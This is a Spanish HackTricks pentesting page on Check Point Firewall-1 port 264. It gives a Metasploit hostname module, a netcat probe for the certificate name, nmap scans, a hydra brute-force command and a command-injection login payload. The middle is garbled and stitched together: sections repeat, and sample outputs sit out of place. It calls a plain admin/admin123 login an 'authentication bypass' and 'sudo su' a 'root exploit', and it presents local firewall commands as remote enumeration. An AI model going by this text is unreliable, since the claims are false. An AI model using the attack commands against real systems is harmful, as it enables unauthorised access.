hacktricks/network-services-pentesting/pentesting-264-check-point-firewall-1.md

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Revisa los PLANES DE SUSCRIPCIÓN!

• Descubre The PEASS Family, nuestra colección exclusiva de NFTs

• Obtén el swag oficial de PEASS y HackTricks

• Únete al 💬 grupo de Discord o al grupo de telegram o sígueme en Twitter 🐦@carlospolopm.

• Comparte tus trucos de hacking enviando PRs al repositorio de hacktricks y al repositorio de hacktricks-cloud.

El módulo envía una consulta al puerto 264/TCP en los firewalls CheckPoint Firewall-1 para obtener el nombre del firewall y el nombre de la estación de gestión (como SmartCenter) a través de una solicitud de preautenticación.

use auxiliary/gather/checkpoint_hostname
set RHOST 10.10.xx.xx

Pentesting Check Point Firewall-1

Enumeración

Fingerprinting

Check Point Firewall-1

Para identificar si el objetivo está utilizando Check Point Firewall-1, se puede utilizar la herramienta fw ctl pstat para obtener información sobre el estado del firewall.

$ fw ctl pstat

---[ Check Point Stateful Inspection Statistics ]---
Memory used:  0 ( 0%)         Compressed: 0 ( 0%)
Conns:       0/0             Peak conns: 0

[...]

Versión del kernel

Para obtener información sobre la versión del kernel, se puede utilizar la herramienta fw ver.

$ fw ver

This is Check Point VPN-1(TM) & FireWall-1(R) R71.30 - Build 462
[...]

Escaneo de puertos

Para realizar un escaneo de puertos, se puede utilizar la herramienta nmap.

$ nmap -sS -p- <IP>

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-01 00:00 EST
Nmap scan report for <IP>
Host is up (0.0010s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh

Explotación

Bypass de autenticación

Bypass de autenticación en la consola de administración

Para realizar un bypass de autenticación en la consola de administración, se puede utilizar el siguiente exploit:

$ curl -k -d "user=admin&password=admin123" https://<IP>/cgi-bin/login

Obtención de información

Obtención de información del sistema

Para obtener información del sistema, se puede utilizar la herramienta uname.

$ uname -a

Linux <hostname> 2.6.18-194.el5 #1 SMP Tue Mar 16 21:52:39 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux

Obtención de información de la configuración del firewall

Para obtener información de la configuración del firewall, se puede utilizar la herramienta fw getifs.

$ fw getifs

eth0      10.0.2.15/24
eth1      192.168.56.101/24

Escalada de privilegios

Escalada de privilegios a root

Para realizar una escalada de privilegios a root, se puede utilizar el siguiente exploit:

$ sudo su

Referencias

• Check Point Firewall-1
• Nmap

[*] Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[+] Appears to be a CheckPoint Firewall...
[+] Firewall Host: FIREFIGHTER-SEC
[+] SmartCenter Host: FIREFIGHTER-MGMT.example.com
[*] Auxiliary module execution completed

Otra forma de obtener el nombre del host y el nombre de ICA del firewall podría ser

printf '\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00' | nc -q 1 x.x.x.x 264 | grep -a CN | cut -c 2-

Pentesting Check Point Firewall-1

Enumeración

Verificación de versión

Para verificar la versión de Check Point Firewall-1, podemos enviar una solicitud HTTP a la dirección IP del firewall utilizando el siguiente comando:

curl -I http://<IP_address>

La respuesta incluirá la versión del firewall.

Escaneo de puertos

Podemos usar herramientas como nmap para escanear los puertos abiertos en el firewall. Por ejemplo:

nmap -sS -p- <IP_address>

Ataques

Fuerza bruta de contraseñas

Podemos intentar realizar un ataque de fuerza bruta para adivinar la contraseña del firewall. Podemos usar herramientas como hydra para realizar este ataque. Por ejemplo:

hydra -l <username> -P <password_list> <IP_address> http-form-post "/login:username=^USER^&password=^PASS^&login=Login:S=logout"

Inyección de comandos

Si podemos encontrar una vulnerabilidad de inyección de comandos en el firewall, podemos intentar ejecutar comandos maliciosos en el sistema. Por ejemplo, si encontramos una vulnerabilidad en la página de inicio de sesión, podemos intentar ejecutar el siguiente comando:

curl -d "username=admin&password=admin;ls" http://<IP_address>/login

Este comando intentará listar los archivos en el sistema.

CN=Panama,O=MGMTT.srv.rxfrmi

Desde: https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los PLANES DE SUSCRIPCIÓN!

• Descubre The PEASS Family, nuestra colección exclusiva de NFTs

• Obtén la oficial PEASS & HackTricks swag

• Únete al 💬 grupo de Discord o al grupo de telegram o sígueme en Twitter 🐦@carlospolopm.

• Comparte tus trucos de hacking enviando PRs al repositorio hacktricks y al repositorio hacktricks-cloud.